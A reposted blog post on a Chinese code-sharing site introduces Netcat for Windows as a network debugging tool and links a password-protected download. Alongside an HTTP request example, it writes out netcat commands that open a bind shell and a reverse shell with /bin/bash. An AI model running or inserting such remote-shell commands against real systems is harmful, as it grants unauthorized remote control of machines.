码迷,mamicode.com
首页 > Windows程序 > 详细

Netcat for Windows

时间:2016-07-11 12:01:18      阅读:764      评论:0      收藏:0      [点我收藏+]

标签:

April 10, 2009

Netcat is a simple networking utility which reads and writes data across network connections using the TCP/IP protocol. It‘s a wonderful tool for debugging all kinds of network problems. It allows you to read and write data over a network socket just as simply as you can read data from stdin or write to stdout. I have put together a few examples of what this can be used to accomplish.

Establishing a connection and getting some data over HTTP:

# nc example.com 80
GET / HTTP/1.0


<HTML>
<!-- site‘s code here -->
</HTML>

Creating a shell:

  1. Remote machine: nc -l 1234 -e /bin/bash
  2. Local machine: nc remote_machine 1234

Creating a reverse shell:

  1. Local machine: nc -l 1234
  2. Remote machine: nc -e /bin/bash local_machine 1234

That‘s just a taste of what netcat can do. I‘m sure you are really just here for the download.

Download nc111nt.zip (password:nc) - Netcat for Windows

from here

Netcat for Windows

标签:

原文地址:http://www.cnblogs.com/tdcqma/p/5659685.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!